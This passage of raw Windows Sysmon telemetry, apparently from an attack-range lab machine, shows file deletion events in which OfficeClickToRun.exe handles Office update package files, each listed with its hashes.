Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FloodgateExperiences\StaticScope.binMD5=25436312962D8F7239D1BABD0C937D0D,SHA256=B18ED002DB2089306922D661AA100AE99CF35341E128A898D609AC2D11E005EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\FloodgateExperiences\Shared_Definitions.jsonMD5=C936FCB08D0FF056E6A645F273848F23,SHA256=0F46672BCBBCC302ACE8AB5C9B8A5942ABC18A991056A6F15BA056C85B9EDB85,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Document Parts\1033\16\Built-In Building Blocks.dotxMD5=45B3206B0A14EB850F21A52116F021EA,SHA256=C6407F48BAE9FF72044F64B06622076A84D9E8F36A9E0F4F0632A5E644ADB6AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\TRANSMGR.DLLMD5=CE947D14EDBB21D2FB831DA611A7D76B,SHA256=2E2B96C26912C488AD2CD2B304BDD8940570DA220F68EDCFEDCC8E977C55DDB7,IMPHASH=BE3A2B535AFFBFBAC0961187C462C01Btruetrue 23542300x800000000000000068816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\RM.DLLMD5=22B108C107115AFC9374E66C570C3A36,SHA256=CFBAF0B0B49B59A8C400876574E01E982EAF610A04D036DADEC17C48E0E16A2A,IMPHASH=9AB80BADECFDB6DB028F15738C3ADCE9truetrue 23542300x800000000000000068815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.595{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\OLTASK.FAEMD5=B4B9224E804D5EEBB94A01746A2B7CAB,SHA256=35A9F22C47447845522D91FF93C8A3BCFDD26E97CE779666601F37514E875D1A,IMPHASH=4F7FB20453409897CB1A08663965CCC5truetrue 23542300x800000000000000068814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\OLNOTE.FAEMD5=34314334A8D7B061E9FE5033CC92520A,SHA256=34BB1FD7E7CF643147995181D4D1CC4E8D59AB84B97709A361DC2317D3C6F787,IMPHASH=0376D22E98908793FC0CD0C506912876truetrue 23542300x800000000000000068813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\OLMAIL.FAEMD5=3F3F9A82B15E07C8349AD5DC725932F0,SHA256=2A51DCFF55C5C7456BD938F01C08BE1EEFC8585069E3735CD83C3F2010658945,IMPHASH=1F696396336C6B0191C68C35EA889D6Ftruetrue 23542300x800000000000000068812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\OLJRNL.FAEMD5=88B8817002DC272640988EFCEA8EA087,SHA256=39F46B0D40C996FFD04D31261FAD6FF5E1DFA1FBB4388B6063D46DB0DEACB6A4,IMPHASH=E085631B88F847695680314BB189887Etruetrue 23542300x800000000000000068811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\OLAPPT.FAEMD5=BFDA649C513A4D7768F40F5B6C71D899,SHA256=059F14C1858648DF0D327EFB2B8EC1EFFCFB85F0DA91BE653EE72F60842775CF,IMPHASH=96441B23B022AA0C4651065456880911truetrue 23542300x800000000000000068810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\OLADD.FAEMD5=0230309D2FA6B396369375D23688B611,SHA256=B81ACF5DCB79716093023375F1D970AA72FA2227A4BAC9BE0347515FD5A7E99A,IMPHASH=9D0158323328560A1176BF5668D5DB6Ftruetrue 23542300x800000000000000068809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\OL.SAMMD5=2A38475297383CE0F2ABCA402F4E484C,SHA256=CC66D17EBF2EC70779DF0233B2E9F9CC5B4683C92D08C67116C32EFBF3217413,IMPHASH=C61168163990624CB74B93F5A8F92FBFtruetrue 23542300x800000000000000068808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\DESKSAM.SAMMD5=B780F2D9D3EA92BDF7AECBD7F85198D5,SHA256=81B5AD6E8075A244CCB29BBE8D5C5BDF81C39BFEC5577B2C840CD38781894C62,IMPHASH=5640A19F89EA58415FF0256D6FE5BA8Atruetrue 23542300x800000000000000068807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\DELIMWIN.FAEMD5=E0AF5A7086C460CD6FDDC8EB5177CC36,SHA256=D80EDF564879C92A81F1A0FA2183CE05962196D26ED56BB36938FE9BA22D56C9,IMPHASH=7519B93D4A5E37493E4B3D4F09BAD0FAtruetrue 23542300x800000000000000068806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\1033\TRANSMRR.DLLMD5=CCF7D1FA617C6AA0464087DDB56F7ECF,SHA256=D7F2FA1F5393EC3C509CE9222882CD876E2223A95DBC231415419A7E8BD28F05,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\1033\OLTASKR.FAEMD5=B0B5B688E0626352C64AE1DE53BBDE18,SHA256=233DC4D23A29F7B7AADD397C93858DF7481DC786BF657F639F9B446D613B2CAD,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\1033\OLR.SAMMD5=20F14A1AB5C2A3DC11743BDFE779B828,SHA256=570531AA3291E3F5312E57BC2F4838A87584C673A0EB1671A105825F8C307248,IMPHASH=23777F97D37DA8BC2D5390806D8C4E53truetrue 23542300x800000000000000068803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\1033\OLNOTER.FAEMD5=020A951D4BD874CFC2D47D7B959EDF63,SHA256=9F9E908E3E31D95F92648891F915DF259A8B0850D4F0860D913591B97423FD65,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068802Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\1033\OLMAILR.FAEMD5=9328629F994665EC504D0660A109497C,SHA256=4B3D7B5716D7649A584D09B38AB93F20AEFD075B15FB952F1C74B65A8D6E295D,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068801Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\1033\OLJRNLR.FAEMD5=B66B7BA69422C25C50B6620259F086E6,SHA256=653EE1F808B720C91DD843B4505025ED1D13930AC3ED2F8E9508BAF6785885D5,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068800Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\1033\OLAPPTR.FAEMD5=B96CD9FA07EC31DB6694CDC700677411,SHA256=9E62C43715643BB29286882FCF6348D38EDC5FD414FB23E86403F817BC38EE08,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068799Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\1033\OLADDR.FAEMD5=1B9966AD8A4DB5D9F52F98E36D66CB6B,SHA256=BB1594DAD2FA80814D5A50411BE6D508213BFEA28F29B7EC687A5481556C472A,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068798Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\1033\LOCALDV.DLLMD5=DF4074FFB223F6748CCAF9461D0DFCE6,SHA256=02D869C21C3370AA8A70EF93F85ABCC0158537D112EE98A74AC05AD5436A8D87,IMPHASH=2F3940CAB1B9FD7D1268D4513A7FB8E7truetrue 23542300x800000000000000068797Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.564{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\CONVERT\1033\DELIMR.FAEMD5=2049646D046FE9643F065D48457F0B20,SHA256=64120AB5FADDCA16FB0F0FCA1355F227B7FC27EC4C8D5A633488C49C86C7C893,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000068796Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Configuration\ssn_high_group_info.txtMD5=E93BA851C150C3DB5E1C600ECB9D82A3,SHA256=53AD5AEDE02146FFA4CF2CF08540FA7D6EAD589307BD72546FF5E14C4091D9B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068795Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Configuration\config.xmlMD5=3A4A01DA8E1179FB1487EC604AAA00A8,SHA256=46E88654C5D2AF7A8AC02E9549AD9C6645C3C3DEA8481A3565A7DB0FFA779E0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068794Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Configuration\card_terms_dict.txtMD5=C35F673F034531AC3A20F6136A9B7870,SHA256=644D45EC3CE1E7DE0CC9799F5F360D36E84CECF6357BC3B79F5BEC2175EAAE5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068793Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Configuration\card_security_terms_dict.txtMD5=B7152D240A2247DED39BCAFA2E38B484,SHA256=2292ABDCE591EE84BD4E5974867A854BEECB6C177CD259BA5007314015C281DA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068792Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Configuration\card_expiration_terms_dict.txtMD5=837B8B70F551DA5C1826358A27E7C3FD,SHA256=C41032F401E64B1D7EBA581FD172F5C46586C7C37919DCD1EDC1801168ED83E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068791Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BORDERS\MSART9.BDRMD5=8A4946ABB56A670640FA2E90D5CA8815,SHA256=02C51B76DD90762EC97AFE992511A84D47E441BBCC3DDB52FFAA039A8E3EC46C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068790Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BORDERS\MSART8.BDRMD5=9858DCC705962614D83C579E187EEA19,SHA256=6E8528EB8F35DC3C3F9CCB92FC2EF8CB2E15A1320AE9CB7F15BD29F8D973B8C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068789Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BORDERS\MSART7.BDRMD5=866D7A5B637C99AA06C29E56B8C713C8,SHA256=413BFF9CB476CAC33086BBC2B989FBE679CBC81B606C52ACB41016A6E9127D0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068788Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BORDERS\MSART6.BDRMD5=CDCD0AA86587AEC6F911519558D11956,SHA256=45704CC0C972EA37377CA465F70A225D3B84EDA1298BA6F41498B296937F696D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068787Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BORDERS\MSART5.BDRMD5=02521C192A2E0D52600DED792B6709BA,SHA256=838CC4FFA2C9CD72F00291606768AAC6AEAA8FE6A51CF61BC808737842D6E3F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068786Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BORDERS\MSART4.BDRMD5=98E1E20AFC95940236B2CD44C0306FEE,SHA256=31A2F48A918B713F2F38CCC2AE10F93AF189C5A88BDC04D07A2A44552F422A57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068785Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BORDERS\MSART3.BDRMD5=2CCD15C3C616F2134551DE0280F6999C,SHA256=88BFD23E43795CE557BD250455A551F756DBC74C9535B3B43F931049EB08881B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068784Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BORDERS\MSART2.BDRMD5=452807BBB7C0343C17F7DE8A4E1BC758,SHA256=292E1C5468AE5901361EA60E740F4BD070D3DE018BB3E6991DFA22D39404D68D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068783Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BORDERS\MSART15.BDRMD5=12006DCF96EF789D90771720B70A0E28,SHA256=62A38632D95877346AB54CF175776A63A84C89C691213FB96D2C7E410459AB82,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068782Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BORDERS\MSART14.BDRMD5=8515F970C2EBCA8F21F7154C7B81EAA2,SHA256=4A27F89FE8A08232D3ED1DCADB44AC8A47D098DAF98029181144AD97F9B18383,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068781Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.533{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BORDERS\MSART13.BDRMD5=DCB365425FC53D3EC5E1DFC95594FFF5,SHA256=B4076026E7F6174912FDD596E3F424F70E93115D9198F9562D8FC4D0B00AA819,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068780Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BORDERS\MSART12.BDRMD5=F89F856A57A5BF3EDC9A821943150EA2,SHA256=6E52EA8B733A36C1CA24805AEBAA34EF9496033A3F18DFCF346B02E32945AFCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068779Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BORDERS\MSART11.BDRMD5=EE18E7E79557AC878F46F9873C02FDFD,SHA256=417B982AB7C5DE67AB3992CDE62DADCB69030B0E32153CEC9BB7566AD2539473,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068778Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BORDERS\MSART10.BDRMD5=E79C07794B5D0F8662E1FB310FC90DD1,SHA256=95B12C0880111B21042CC77AC67F290C0491B7668F287D0822BB8839D079D508,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068777Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\BORDERS\MSART1.BDRMD5=07263321B006F19F3CBB6353D2FF7012,SHA256=A8DE1370BF0871F3B18DF94062468D831C3623BCA72A3D6AF712A33409A83A10,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068776Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\Bibliography\Author2XML.XSLMD5=6BB9A08E3071E89E5A00CEF9DBAA74CE,SHA256=DFBE26E51D09ED016C7269BB345F24443018292CACBA32B8D778A8F6609DD619,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000068775Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.517{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft 